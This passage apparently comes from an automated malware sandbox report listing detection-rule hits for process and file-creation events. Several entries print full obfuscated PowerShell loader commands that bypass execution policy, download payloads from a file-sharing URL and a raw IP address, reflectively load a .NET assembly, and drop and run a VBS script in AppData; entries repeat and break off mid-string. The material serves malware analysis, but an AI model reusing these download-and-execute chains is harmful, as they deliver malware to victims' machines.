ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , ProcessId: 5560, ProcessName: wscript.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5536, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", ProcessId: 3092, ProcessName: aspnet_compiler.exe
                Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtTeXN0ZW0uVCcrJ2V4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKHB3Z2ltYWdlQnl0ZXMpO3B3Z3N0YXJ0RmxhZyA9IG9UQTw8QkFTRTY0XycrJ1NUQVJUPj5vVEE7cHdnZW5kRmxhZyA9IG9UQTw8QkFTRTY0X0VORD4+b1RBO3B3Z3N0YXJ0SW5kZXggPSBwd2dpbWFnZVRleHQuSW5kZXhPZihwd2dzdGFydEZsYWcpO3B3Z2VuZEluZGV4ID0gcHdnaW1hZ2VUZXh0LkluZGV4JysnT2YocHdnZW5kRmxhZyk7cHdnJysnc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHB3Z2VuZEluZGV4IC1ndCBwd2dzdGFydEluZGV4O3B3Z3N0YXJ0SW5kZXggKz0gcHdnc3RhcnRGbGFnLkxlbmd0aDtwd2diYXNlNjRMZW5ndGggPSBwd2dlbmRJbmRleCAtIHB3Z3N0YXJ0SW5kZXg7cHdnYmFzZTY0Q29tbWFuZCcrJyA9IHB3Z2ltYWdlVGV4dC5TdWJzdHJpbmcocHdnc3RhcnRJbmRleCwgcHdnYmFzZTY0TGVuZ3RoKTtwd2diYXNlNjRSZXZlcnNlZCA9IC1qb2luIChwd2diYXNlNjRDb21tYW5kLlRvJysnQ2hhckFycmF5KCkgNG91IEZvckVhY2gtT2JqZWN0IHsgcHdnXyB9KVstMS4uLShwd2diYXNlNjRDb21tYW5kLkxlbmd0aCldO3B3Z2NvbScrJ21hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcocHdnYmFzZTY0UmV2ZXJzZWQpO3B3Z2xvYWRlZEFzc2VtYmwnKyd5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChwd2djb21tYW5kQnl0ZXMpO3B3Z3ZhaU1ldGhvZCA9IFtkbicrJ2xpYi5JTy5Ib21lXS5HJysnZXRNZXRob2Qob1RBVkFJb1RBKTtwd2d2YWknKydNZXRob2QuSW52b2tlKHB3JysnZ251bGwsIEAob1RBdHh0LlNMTFBNUy8yMy82MzEuMzQyLjMuMjkxLy86cHR0aG9UQSwgb1RBZGVzYXRpdmFkb29UQSwnKycgb1RBZGVzJysnYXRpdmFkb29UQSwgb1RBZGVzYXQnKydpdmFkb29UQSwgb1RBYXNwbmV0X2NvbXBpbGVyb1RBLCBvVEFkJysnZXNhdGl2YWRvb1RBLCBvVEFkZXNhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpdmFkJysnb29UQSxvVEFkZScrJ3NhdGl2YWRvb1RBLG9UQWRlc2F0aXZhZG9vVEEsb1RBZGVzYXRpJysndmFkb29UQSxvVCcrJ0Exb1RBLG9UJysnQWRlc2F0aXZhZG9vVEEpKTsnKS5SZXBMQWNlKCdwd2cnLFtTVHJJbmddW0NoQXJdMzYpLlJlcExBY2UoKFtDaEFyXTExMStbQ2hBcl04NCtbQ2hBcl02NSksW1NUckluZ11bQ2hBcl0zOSkuUmVwTEFjZSgoW0NoQXJdNTIrW0NoQXJdMTExK1tDaEFyXTExNyksJ3wnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHZFckJPU2VQUkVmRVJlbkNlLlRPc3RyaW5nKClbMSwzXSsneCctSm9JbicnKSAoKCdwd2dpbWFnZVVybCcrJyAnKyc9IG9UQWh0dHBzOi8vMTAxNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5UJysnSUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1dyZwa192aWQ9ZmQ0ZjYxNGJiJysnMjA5YzYyYzE3MzA5NDUxNzZhMDkwNGYgb1RBOycrJ3B3Z3dlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cHdnaW1hZ2VCeXRlcyA9IHB3Z3dlYkNsaWVudC5Eb3dubCcrJ29hZERhdGEocHdnaW1hZ2VVcmwpO3B3Z2ltYWdlVGV4dCA9IFtT
                Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline", ProcessId: 2364, ProcessName: csc.exe
                Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS
                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3160, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemybestthingswithentirelifetimethingstodomyb.vbS" , ProcessId: 5560, ProcessName: wscript.exe
                Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3160, TargetFilename: C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.cmdline
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUHpYKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAidUdVV29mIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5UW9Oc3ZVWVFmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICR3ODJtUUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzMyL3NlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWJlc3QudElGIiwiJGVOdjpBUFBEQVRBXHNlZW15YmVzdHRoaW5nc3dpdGhlbnRpcmVsaWZldGltZXRoaW5nc3RvZG9teWIudmJTIiwwLDApO1NUYXJULXNMZUVQKDMpO2lleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcc2VlbXliZXN0dGhpbmdzd2l0aGVudGlyZWxpZmV0aW1ldGhpbmdzdG9kb215Yi52YlMi'+[ChAr]34+'))')))", CommandLine: "C:\Windows\SYsTem32\wiNdOwSPowErSHelL\v1.0\poWErSHELL.EXE" "POwERshelL.ExE -eX bYpasS -NOP -w 1 -C DeVIceCrEdENTialdEPLOYMeNT ; InVOke-expRESSioN($(InVokE-eXpReSsioN('[systEM.text.encoDinG]'+[ChAr]0x3A+[ChaR]0x3A+'UtF8.getSTRing([system.conVeRt]'+[chaR]0X3a+[Char]0x3A+'fROMbASE64sTrinG('+[CHAR]0X22+'JHc4Mm1RRCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVHlwRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1iRVJkRUZJTmlUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1PTi5kbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJdCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHZ2J5dVJqRE9ULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN6S3pyLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwVVIsSW50UHRyICAgICAgICA
                Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.Home].G'+'etMethod(oTAVAIoTA);pwgvai'+'Method.Invoke(pw'+'gnull, @(oTAtxt.SLLPMS/23/631.342.3.291//:ptthoTA, oTAdesativadooTA,'+' oTAdes'+'ativadooTA, oTAdesat'+'ivadooTA, oTAaspnet_compileroTA, oTAd'+'esativadooTA, oTAdesativadooTA,oTAdesativadooTA,oTAdesativad'+'ooTA,oTAde'+'sativadooTA,oTAdesativadooTA,oTAdesati'+'vadooTA,oT'+'A1oTA,oT'+'AdesativadooTA));').RepLAce('pwg',[STrIng][ChAr]36).RepLAce(([ChAr]111+[ChAr]84+[ChAr]65),[STrIng][ChAr]39).RepLAce(([ChAr]52+[ChAr]111+[ChAr]117),'|'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $vErBOSePREfERenCe.TOstring()[1,3]+'x'-JoIn'') (('pwgimageUrl'+' '+'= oTAhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT'+'ICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb'+'209c62c1730945176a0904f oTA;'+'pwgwebClient = New-Object System.Net.WebClient;pwgimageBytes = pwgwebClient.Downl'+'oadData(pwgimageUrl);pwgimageText = [System.T'+'ext.Encoding]::UTF8.GetString(pwgimageBytes);pwgstartFlag = oTA<<BASE64_'+'START>>oTA;pwgendFlag = oTA<<BASE64_END>>oTA;pwgstartIndex = pwgimageText.IndexOf(pwgstartFlag);pwgendIndex = pwgimageText.Index'+'Of(pwgendFlag);pwg'+'startIndex -ge 0 -and pwgendIndex -gt pwgstartIndex;pwgstartIndex += pwgstartFlag.Length;pwgbase64Length = pwgendIndex - pwgstartIndex;pwgbase64Command'+' = pwgimageText.Substring(pwgstartIndex, pwgbase64Length);pwgbase64Reversed = -join (pwgbase64Command.To'+'CharArray() 4ou ForEach-Object { pwg_ })[-1..-(pwgbase64Command.Length)];pwgcom'+'mandBytes = [System.Convert]::FromBase64String(pwgbase64Reversed);pwgloadedAssembl'+'y = [System.Reflection.Assembly]::Load(pwgcommandBytes);pwgvaiMethod = [dn'+'lib.IO.

                Data Obfuscation

                barindex
